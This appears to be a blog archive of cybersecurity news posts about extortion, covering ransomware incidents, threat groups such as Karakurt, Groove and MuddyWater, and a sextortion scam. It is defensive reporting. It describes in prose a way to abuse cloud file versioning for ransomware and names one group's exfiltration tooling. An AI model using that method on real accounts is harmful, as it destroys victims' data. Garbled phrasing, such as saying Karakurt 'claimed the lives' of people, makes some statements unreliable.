Search This Blog

Showing posts with label Extortion. Show all posts

Cyber-attacks on Port of Los Angeles Doubled Since Pandemic

 

According to recent research, one of the world's biggest ports has witnessed an unusual spike in cyber-attacks since the outbreak began. The Port of Los Angeles' executive director, Gene Seroka, told the BBC World Service over the weekend that the facility receives roughly 40 million attacks every month. 

"Our intelligence shows the threats are coming from Russia and parts of Europe. We have to stay steps ahead of those who want to hurt international commerce. We must take every precaution against potential cyber-incidents, particularly those that could threaten or disrupt the flow of cargo,” he further added. 

Ransomware, malware, spear phishing, and credential harvesting attacks appear to be among the threats aimed against the facility, which is the busiest in the Western Hemisphere. The goal seems to harm the US economy in many situations, however, profits through extortion and data theft will also be a factor. 

Such dangers, if not adequately managed, can potentially exacerbate COVID-era supply chain snarls. Seroka said that port blockages will not be cleared completely until next year, even though the number of container ships waiting more than two days to offload has reportedly reduced from 109 in January to 20 today. 

"The past two years have proven the vital role that ports hold to our nation's critical infrastructure, supply chains and economy. It's paramount we keep the systems as secure as possible," Seroka expressed. 

The challenge is so acute that the port established one of the world's first Cyber Resilience Centers in collaboration with the FBI. It provides a single site for port stakeholders such as shipping corporations to receive, evaluate, and exchange threat intelligence. 

Ports have become such a popular target for cyber-criminals, particularly those aiming to undermine operations and extort businesses, due to their strategic significance to global trade.

Researchers Alert About Ransomware Attacks Targeting Microsoft Cloud ‘Versioning’ Feature

Researchers detected a functionality in Office 365 that enables cybercriminals to ransom items stored on SharePoint and OneDrive. When the researchers informed Microsoft, they were assured that the system was functioning as designed and it is a feature rather than a vulnerability. 

Files stored and updated on the cloud have long been thought to be resistant to encryption extortion — the autosave and versioning capabilities should offer enough backup capability. Researchers at Proofpoint have displayed that this is a false assumption. They reported, “Our research focused on… SharePoint Online and OneDrive… and shows that ransomware actors can now target organizations’ data in the cloud and launch attacks on cloud infrastructure.” 

There are two ways to accomplish this using the Microsoft versioning feature (which allows the user to specify the maximum number of older versions to be stored). Older versions beyond this level are designed difficult, if not impossible to recover. The first attack is more theoretical than practical, while the second is undeniably practical. The maximum number of revisions of a document that may be saved by default is 500. Simply said, the attacker modifies and encrypts the file 501 times. 

The changes do not have to be significant - just enough to cause the system to save the new (encrypted) version. All versions of the document will be encrypted by the completion of the procedure, and the file will be unrecoverable without the decryption key. This is a theoretical attack. In actuality, it would be loud and easily discovered. The second method is more practical: utilise the built-in user-controlled versioning tool to reduce the number of stored versions to one. 

Every SharePoint and OneDrive document library includes a user-configurable parameter for the number of stored versions, which can be found under list settings for each document library. Setting the version limit to zero does not help an attacker since it does not erase older versions that the user can still recover. 

If the limit is set to one, the file only has to be encrypted twice before the user loses access to its contents. If information is exfiltrated before encryption, the attacker has the option of launching a second extortion attempt. The attack chain includes initial access via compromised or hijacked user identities, account takeover and discovery, versioning reduction, file exfiltration, and encryption, and extortion. 

If the file owner keeps a local copy of the file, the impact of this attack will be limited. In this case, the attacker must compromise both the endpoint and the cloud account to ensure success. Proofpoint followed the Microsoft disclosure route and submitted the vulnerability to Microsoft before publicly revealing it. 

Microsoft stated that, first, the versioning settings function properly, and that, second, previous versions of files can potentially be retrieved and restored for an additional 14 days with the aid of Microsoft Support. 

“However,” write the researchers, “Proofpoint attempted to retrieve and restore old versions through this process (i.e., with Microsoft Support) and was not successful. Secondly, even if the versioning settings configuration workflow is as intended, Proofpoint has shown that it can be abused by attackers towards cloud ransomware aims.”

Therefore, the conclusion of the story is straightforward do not think files saved and updated in the cloud are immune to extortion attempts. Ransomware mitigation procedures must still be in place.

A Cyber-Attack has Disrupted Slovenia's Most Popular TV Channel

 

In what appears to be an extortion attempt, a cyber-attack has crippled the operations of Pop TV, Slovenia's most popular TV channel. The attack, which occurred on Tuesday, disrupted Pop TV's computer network, preventing the firm from displaying computer graphics for the evening edition of 24UR, the station's daily news broadcast. 

Pop TV said in a statement on Tuesday, the day of the attack, that the night edition of the same show was canceled entirely, albeit a truncated version of the news appeared on the company's website. While news broadcasts were resumed the following day, the attack had an impact on other aspects of the network's operation. 

"At Pro plus media house, we are rebuilding a business that has been disrupted by a recent cyber-attack. We cannot yet estimate the full extent of the attack, we are currently focusing all our efforts on putting our main systems back into their original operation as soon as possible, which will enable the smooth operation of television programs and websites," the company said. 

Pop TV stated in a second statement on Wednesday that the attack also targeted several of its online servers, including VOYO, an on-demand streaming platform that includes channels from its parent firm as well as licensed movies and TV shows. The attack, according to the firm, stopped its employees from contributing new content to the site as well as broadcasting any of its channels or live sporting events, such as the Winter Olympics, which enraged many of its paid users. 

According to the Slovenian news outlet Zurnal24, Pop TV is being extorted by international hackers in what looks to be a ransomware-style attack. Slovenia's Computer Emergency Response Team, SI-CERT, also published a statement, saying that it was assisting the TV station in dealing with the incident but refused to provide any further insights.

Several prominent TV stations have been targeted by cyber-attacks in recent years, including France's M6 (October 2019), The Weather Channel (April 2019), the Cox Media Group (June 2021), the Sinclair Broadcast Group in the United States (October 2021), Portugal's SIC (January 2021), and Iran's IRIB (February 2021). 

With the exception of the IRIB incident, most of these were ransomware assaults on the stations' backend IT infrastructure, causing broadcasts to go offline for hours while engineers worked to restore systems, implying that Pop TV got off easier than the majority of the previous incidents.

U.S. Cyber Command Officially Links MuddyWater Gang to Iranian Intelligence

 

The US military's Cyber Command on Wednesday officially tied the Iranian-backed MuddyWatter hacking group to Iran's Ministry of Intelligence and Security (MOIS).

According to Cyber Command, the hacking group was first identified in 2017 and is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS), which is involved in both domestic surveillance operations and the targeting of a wide spectrum of entities in governments, academia, cryptocurrency, telecommunications, and oil sectors in the Middle East.

"MuddyWater is an Iranian threat group; previously, the industry has reported that MuddyWater has primarily targeted Middle Eastern nations, and has also targeted European and North American nations," Cyber Command said in a statement.

On Twitter, Cyber Command said the malicious group was employing a suite of malware for espionage and malicious activity. "MOIS hacker group MuddyWater is using open-source code for malware," it said. "MuddyWater and other Iranian MOIS APTs are using DNS tunneling to communicate to its C2 infrastructure; if you see this on your network, look for suspicious outbound traffic."

In partnership with the FBI, USCYBERCOM's Cyber National Mission Force (CNMF) has also shared multiple malware samples of PowGoop, a DLL loader designed to decrypt and run a PowerShell-based malware downloader. Five of the files that CYBERCOM has uploaded to VirusTotal this week aren’t identified as malicious by any of the antivirus engines in the scanning service, while six others have very low detection rates.

"If you see a combination of these tools, Iranian MOIS actor MuddyWater may be in your network. MuddyWater has been seen using a variety of techniques to maintain access to victim networks," the US military command added. "These include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions."

Last year in November, cyber authorities across the US, UK, and Australia attributed attacks exploiting loopholes in Fortinet and Exchanges to Iranian-backed attackers. Rather than targeting a particular sector of the economy, the malicious actors were simply focused on exploiting the vulnerabilities wherever possible; following the operation, they then attempted to turn that initial access into data exfiltration, a ransomware attack, or extortion.

‘Karakurt’ Extortion Back with an Upswing

 

As of late, a new money-driven attack group has been on the upswing, and unlike previous groups, it does not appear to be interested in spreading ransomware or attacking high-profile targets. 

Accenture Security researchers have been investigating a group that calls itself "Karakurt," meaning "black wolf" in Turkish, and is also the name of a deadly spider prevalent in eastern Europe and Siberia. 

Karakurt specializes in data exfiltration and eventual extortion, which allows them to operate swiftly. It already has claimed the lives of more than 40 people until September, with 95 percent of them in North America and the rest in Europe, according to a paper released on Friday by academics. 

Experts suggest Karakurt would be a trend-setter, and shortly, similar groups may shift away from attacking large corporations or critical-infrastructure providers with ransomware and instead take a similar exfiltration/extortion technique. 

“The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big-game hunting approach,” read the report.

According to Accenture CIFR researchers, Karakurt was originally spotted by investigators outside of Accenture Security in June since it started building up its network and data-leak platforms. In August, the group registered the domains karakurt.group and karakurt.tech, as well as the Twitter, handle @karakurtlair. Shortly the organization launched its first successful attack. 

Accenture Security's collecting sources and intrusion research discovered the organization's first target in September; two months later, the group revealed their victim on the karakurt.group website.

Karakurt's tactics, techniques, and procedures (TTP) for infiltrating victim infrastructures, accomplishing persistence, relocating laterally, and stealing data are similar to those used by numerous threat actors and the group frequently takes a "living off the land" strategy relying on the attack surface, i.e., utilizing tools or features which already belong across the targeted system. 

Karakurt primarily employs service installation, remote-management software, and the delivery of command-and-control (C2) beacons throughout victim environments via Cobalt Strike to sustain persistence once connected to a network. 

However, experts have noticed that the group recently appears to have changed methods in its implementation of backup persistence. Karakurt "persisted within the victim's network via the VPN IP pool or installed AnyDesk to allow external remote access to compromised devices" rather than delivering Cobalt Strike, they stated. This enables the gang to migrate laterally by leveraging previously obtained user, service, and administrator personal information. 

Researchers stated the gang will also employ additional remote-management technologies, such as remote desktop protocol (RDP), Cobalt Strike, and PowerShell commands, to travel laterally and uncover relevant data to steal and exploit for extortion reasons as needed. 

Nevertheless, the group's assault pattern thus far demonstrates that it is adaptable enough to change its techniques based on the victim's circumstances. Karakurt can also avoid detection in many circumstances since it frequently utilizes authorized credentials to access websites. 

Ultimately, Karakurt employs 7zip and WinZip for data compression, along with Rclone or FileZilla (SFTP) for staging and final exfiltration to Mega.io cloud storage, to steal information. Also according to Accenture Security, the staging folders utilized to exfiltrate data in assaults were C:Perflogs and C:Recovery. 

Researchers offered standard mitigation recommendations to enterprises to prevent being penetrated and extorted by Karakurt, which will call them several times to put pressure over them to pay once their data has been stolen.

Groove Ransomware Gang Approaches other Ransomware Gangs to Strike Attacks against the US

 

Following the shutting down of REvil's networks and infrastructure last week by the law authorities, the Groove ransomware gang has called on certain other extortion organizations to strike US interests. 

The REvil ransomware campaign was halted again during the weekend, according to Bleeping Computer, when an unidentified third party hacked its dark web domains. The Russian-led REvil ransomware syndicate was brought down by an extensive multi-country law enforcement investigation in the last week, which led to its network getting hacked and getting knocked offline again for the second time, in the latest effort taken by governments to destabilize the lucrative ecosystem. 

Whilst this takedown, a recognized REvil operator alleged that the unknown party was "looking" for them by changing configuration settings to lure the threat actor into visiting a site maintained by the mysterious entity. According to Reuters, REvil's takedown was the culmination of a multinational law enforcement effort that included FBI assistance. 

In a Russian blog post, the Groove ransomware group urged all the other ransomware organizations to target and attack US interests. 

The blog post also urges ransomware operators not to target Chinese enterprises, as organizations may need to utilize the nation as a haven if Russia takes a tougher stance against cybercriminals operating within its borders. 

The entire translated message, with some unacceptable phrases censored, read:

"In our difficult and troubled time when the US government is trying to fight us, I call on all partner programs to stop competing, unite and start xxcking up the US public sector, show this old man who is the boss here who is the boss and will be on the Internet while our boys were dying on honeypots, the nets from rude aibi squeezed their own... but he was rewarded with higher and now he will go to jail for treason, so let's help our state fight against such ghouls as cybersecurity firms that are sold to amers, like US government agencies, I urge not to attack Chinese companies, because where do we pinch if our homeland suddenly turns away from us, only to our good neighbors - the Chinese! I BELIEVE THAT ALL ZONES IN THE USA WILL BE OPENED, ALL xxOES WILL COME OUT AND xxCK THIS xxCKING BIDEN IN ALL THE CRACKS, I myself will personally make efforts to do this" - Groove ransomware. 

The possibility of assaults on US interests is consistent with previous information supplied this week to BleepingComputer by a threat intelligence analyst for a Dutch bank. 

After closing down and separating from the original Babuk Ransomware operation, a threat actor identified as 'Orange' created the RAMP hacker forum in July 2021. Because Orange still had control of Babuk's Tor site, he utilized it to build the hacker forum wherein he served as an administrator. Orange is also thought to be a symbol of the Groove ransomware attack. 

Orange recently resigned as the forum's administrator to explore a new venture, but he provided no additional details. 

In addition, a subsequent tweet implies that the malicious actor is likely launching a new ransomware campaign after actively seeking the purchase of network access to US hospitals and government entities. 

It's indeed unknown if 'Orange' would carry out these assaults on US firms as part of the Groove operation or initiate a separate ransomware campaign.

USD 50 Million Ransom Demanded from Saudi Aramco Over Leaked Data

 

Saudi Arabia's state oil firm admitted on Wednesday that data from the corporation was leaked and that the files are now being used in a cyber-extortion effort including a USD 50 million ransom demand. The data was presumably leaked by one of the company's contractors. Saudi Aramco, the Saudi Arabian Oil Co., notified The Associated Press that it "recently became aware of the indirect release of a limited amount of company data which was held by third-party contractors."

Saudi Aramco is a public Saudi Arabian oil and gas enterprise headquartered in Dhahran. It is expected to be one of the world's most profitable corporations as of 2020. Saudi Aramco has the world's second-biggest proven crude oil reserves, with about 270 billion barrels (43 billion cubic metres), as well as the world's greatest daily oil production. 

The Master Gas System, operated by Saudi Aramco, is the world's biggest single hydrocarbon network. It handles about one hundred oil and gas fields in Saudi Arabia, including 288.4 trillion standard cubic feet (scf) of natural gas reserves, and its crude oil production totaled 3.4 billion barrels (540 million cubic metres) in 2013. The Ghawar Field, the world's largest onshore oil field, and the Safaniya Field, the world's largest offshore oil field, are both operated by Saudi Aramco. 

The oil company did not specify which contractor was affected, nor did it clarify whether the contractor was hacked or if the information was released in some other way. "We confirm that the release of data was not due to a breach of our systems, has no impact on our operations and the company continues to maintain a robust cybersecurity posture," Aramco said. 

The AP found a page on the darknet, a section of the internet kept behind an encrypted network and accessible only through specific anonymity-providing tools, that claimed the extortionist had 1 terabyte of Aramco data. The page offered Aramco the chance to have the data destroyed for USD 50 million in cryptocurrency, with a countdown counting down from USD 5 million, most likely to put pressure on the corporation. It's still unknown who's behind the ransom plot. 

Aramco has previously been the victim of cyber-attacks. The so-called Shamoon computer virus, which destroyed hard drives and then flashed a picture of a burning American flag on computer displays, affected the oil behemoth in 2012. Aramco was compelled to shut down its network and destroy over 30,000 machines as a result of the attack. Later, US officials blamed the strike on Iran, whose nuclear enrichment programme had just been targeted by the Stuxnet virus, which was most likely created by the US and Israel.

Shell’s Employees’ Visas Dumped Online as part of Extortion Attempt

 



Royal Dutch Shell became the latest corporation to witness an attack by the Clop ransomware group. The compromised servers were rebuilt and brought into service with a new Accellion security patch; the security patch eliminates the vulnerabilities and enhances security controls to detect new attacks and threats. 

"A cyber incident impacted a third-party, Accellion, software tool called the File Transfer Appliance (FTA) which is used within Shell," stated Shell spinner. In a statement last week, Shell confirmed that it too was affected by the security incident but it has only affected the Accellion FTA appliance which is used to transfer large data files securely by the company. 

In an attempt to bribe the company into paying a ransom, the criminals behind the malware have siphoned sensitive documents from a software system used by Shell and leaked some of the data online, including a set of employees' passports and visa scans. The idea being that once the ransom is paid, no further information will be released into the public domain. 

As stated by Shell, the data accessed during a “limited window of time” contained some personal data together with data from Shell companies and some of their stakeholders. The company to downplay the impact stated that “there is no evidence of any impact to Shell’s core IT systems,” and the server accessed was “isolated from the rest of Shell’s digital infrastructure.” But it did acknowledge that the crooks had probably grabbed “some personal data and data from Shell companies and some of their stakeholders.” 

Previously this month, files from infosec outfit Qualys, including purchase orders, appliance scan results, and quotations also surfaced on the extortionists' hidden site. Other victims include Canadian aerospace firm Bombardier, which had details of a military-grade radar leaked, London ad agency The7stars, and German giant Software AG.

The group has now posted several documents to its Tor-hidden website, including scans of supposed Shell employees' US visas, a passport page, and files from its American and Hungarian offices, in order to persuade Shell to compensate the hackers and prevent more stolen data from leaking. 

According to BleepingComputer, to stack up the pressure, the Clop gang now e-mails its victims' to warn them that the data is stolen and will be leaked if a ransom is not paid.

Serco Affirms Babuk Ransomware Attack

 

Outsourcing giant Serco has affirmed that parts of its infrastructure in mainland Europe have been hit by a double extortion ransomware assault from the new Babuk group, however, the parts of its operation relating to the NHS Test and Trace program are unaffected. “Serco’s mainland European business has been subject to a cyber-attack,” a Serco representative said. “The attack was isolated to our continental European business, which accounts for less than 3% of our overall business. It has not impacted our other business or operations.” 

The incident comes after security firms and insurers progressively have stressed that digital extortionists gain from other assailants' techniques, outsource a portion of their operations and depend on connections to infiltrate victim networks. Albeit the NHS Test and Trace program was unaffected by the incident, ThreatConnect EMEA vice-president Miles Tappin said the vulnerabilities in Serco's wider systems were of incredible concern, and the Babuk assault uncovered “inherent weaknesses of the system”. 

“Like many actors new to the world of ransomware, the actor behind Babuk ransomware has been learning on the job while drawing insights from other criminal groups,” said Allan Liska, an intelligence analyst at the threat intelligence company Recorded Future. In the ransom note, Babuk's operators professed to have approached Serco's systems for three weeks and to have as of now exfiltrated a terabyte of information. The cybercriminals made explicit references to Serco partners, including Nato and the Belgian Army, and threatened Serco with consequences under the General Data Protection Regulation (GDPR). 

The attacker has demanded $60,000 to $85,000 in ransoms, however, that is “likely to increase over time as the threat actor becomes more experienced in ransomware operations,” as indicated by a private analysis from PricewaterhouseCoopers got by CyberScoop. Babuk is a long way from sophistication. Its code has contained mistakes that held it back from executing on some targeted computers, as indicated by PwC. “We assess that, due to a disregard for error checking, Babuk would fail to execute altogether in some environments,” the analysis says. 

However, while Babuk is as yet a moderately low-level threat to associations, as indicated by Liska, that could change on the off chance that they can bring in more cash from assaults and put resources into new capabilities.

Cyber Extortionist Pretends To Be From US Police; Demands $2000 in Bitcoin To Delete Evidence!







A cyber extortionist acts to be a US State Police detective and promises to delete child porn evidence for $2,000 in Bitcoins including a phone number which could be used to contact the scammer.

“Sextortion” emails have become quite common where the sender cites that the recipient’s computer has been hacked with the recording of them while on the adult sites.

On the other hand extortionists pretend to be hitmen and asking for money to call off the hit, bomb threats and tarnishing website’s reputation.


The aforementioned extortionist accuses the victim of child pornography and that the evidence could be deleted if they pay the sender $2,000 in Bitcoins.

Florida, Minnesota, Georgia, Tennessee, California and New York are a few of the states where the victims mentioned that the mails they got were from.

Per sources, the email sent by the extortionists pretending to be from the Tennessee State Police included the following phrases:
·       “Do not ignore the important warning”
·       “I work in the Bureau of Criminal Investigation, detective branch Crime Prevention with child abuse.”
·       “You uploaded video child-porno to websites”
·       “not possible to prove you didnt this”
·       “I retire in next month and want to earns some money for self”
·       “Pay me to Bitcoin wallet”
·       “This is anonymous money I want 2000$”
·       “Send transfer to my wallet”
·       “My temporary phone to contact”
·       “After receiving payments, I delete All materials”
·       “If you don’t pay me, I sending materials to The Tennessee Crime Laboratory.”

All the emails happen to be the same, the same Bitcoin address 17isAHrP2cZSY8vpJrTs8g4MHc1FDXvAMu


 but just the state’s name different.

The attacker(s) is/are using a data breach dump which contains both email and home address so that the state in the email could be matched up with the target’s state of residence.

Extortion scams don’t usually contain the scammers contact number and matching the state of residence with that in the email is surely a nice touch there.

But whenever an email turns up where the sender asks for money it’s obviously to be aborted.

Hacker Infiltrates the Company's IT Network; Businesses affected suffered an estimated $1.5 Million damages.






A 37-year-old man from Edmonton is facing fraud and extortion charges against him after a local business network was allegedly hacked by him.

The police said in a release that they had received a report over the alleged hacking of their IT infrastructure in July 2017. And believe that the suspect infiltrated the company’s IT Network and quite successfully took control over their email and smartphone servers and demanded payment in bitcoins in order to keep any further harm to the business.

 The EPS Cyber Crime Investigations Unit investigated the case further and managed to identify the alleged suspect successfully.

 The police postulate that the same man is responsible for hacking the networks of no less than four other Edmonton-based companies.

 “Once the networks were accessed, the suspect targeted financial data, including online store accounts and email accounts, from the companies as well as the employees.” Says, Const. Phil Hawkins.

Including moreover, he clarified that the type of intrusion that occurred in this case, which resulted in a momentous loss to the business, including the time and resources has affected the business in such a way that it suffered an estimated $1.5 million in combined damages.


The 37-year-old Jeffrey Johnston, therefore, is charged with 18 criminal offences including, three counts each dealing with mischief in relation to computer data, two each of fraudulently obtaining computer service, along with mischief related to data and unauthorized use of computer services and not to mention single counts of theft over $5,000.